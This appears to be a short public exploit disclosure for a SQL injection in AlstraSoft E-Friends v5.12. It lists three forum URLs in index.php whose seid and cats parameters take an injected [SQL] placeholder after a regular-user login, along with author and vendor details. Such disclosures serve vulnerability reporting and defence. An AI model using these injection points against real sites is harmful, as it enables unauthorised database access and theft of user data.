20 lines
No EOL
721 B
Text
20 lines
No EOL
721 B
Text
# # # # #
|
|
# Exploit Title: AlstraSoft E-Friends v5.12 Script - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 04.02.2017
|
|
# Vendor Homepage: http://www.alstrasoft.com/
|
|
# Software Buy: http://www.alstrasoft.com/efriends.htm
|
|
# Demo: http://alstrahost.com/friends/
|
|
# Version: 5.12
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[beygir]ihsan[nokta]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# Login as regular user
|
|
# http://localhost/[PATH]/index.php?mode=forums&act=viewcat&seid=[SQL]
|
|
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=[SQL]
|
|
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=131&seid=[SQL]
|
|
# # # # # |